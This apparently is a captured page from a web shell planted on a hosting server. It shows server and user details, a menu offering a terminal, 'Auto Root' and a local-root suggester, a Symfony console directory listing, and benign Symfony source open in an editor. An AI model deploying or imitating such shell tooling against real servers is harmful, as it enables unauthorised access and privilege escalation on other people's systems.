Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.216.199
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
schoolms /
vendor /
symfony /
console /
Delete
Unzip
Name
Size
Permission
Date
Action
Attribute
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
CI
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Command
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
CommandLoader
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Completion
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
DataCollector
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Debug
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
DependencyInjection
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Descriptor
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Event
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
EventListener
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Exception
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Formatter
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Helper
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Input
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Logger
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Messenger
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Output
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Question
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Resources
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
SignalRegistry
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Style
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Tester
[ DIR ]
drwxrwxrwx
2025-03-23 13:35
Application.php
46.71
KB
-rw-rw-rw-
2024-12-10 16:49
CHANGELOG.md
11.37
KB
-rw-rw-rw-
2024-12-10 16:49
Color.php
3.7
KB
-rw-rw-rw-
2024-12-10 16:49
ConsoleEvents.php
2.12
KB
-rw-rw-rw-
2024-12-10 16:49
Cursor.php
3.88
KB
-rw-rw-rw-
2024-12-10 16:49
LICENSE
1.04
KB
-rw-rw-rw-
2024-12-10 16:49
README.md
782
B
-rw-rw-rw-
2024-12-10 16:49
SingleCommandApplication.php
1.75
KB
-rw-rw-rw-
2024-12-10 16:49
Terminal.php
6.61
KB
-rw-rw-rw-
2024-12-10 16:49
composer.json
1.63
KB
-rw-rw-rw-
2024-12-10 16:49
Save
Rename
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Console; use Symfony\Component\Console\Command\Command; use Symfony\Component\Console\Input\InputInterface; use Symfony\Component\Console\Output\OutputInterface; /** * @author Grégoire Pineau <lyrixx@lyrixx.info> */ class SingleCommandApplication extends Command { private string $version = 'UNKNOWN'; private bool $autoExit = true; private bool $running = false; /** * @return $this */ public function setVersion(string $version): static { $this->version = $version; return $this; } /** * @final * * @return $this */ public function setAutoExit(bool $autoExit): static { $this->autoExit = $autoExit; return $this; } public function run(?InputInterface $input = null, ?OutputInterface $output = null): int { if ($this->running) { return parent::run($input, $output); } // We use the command name as the application name $application = new Application($this->getName() ?: 'UNKNOWN', $this->version); $application->setAutoExit($this->autoExit); // Fix the usage of the command displayed with "--help" $this->setName($_SERVER['argv'][0]); $application->add($this); $application->setDefaultCommand($this->getName(), true); $this->running = true; try { $ret = $application->run($input, $output); } finally { $this->running = false; } return $ret; } }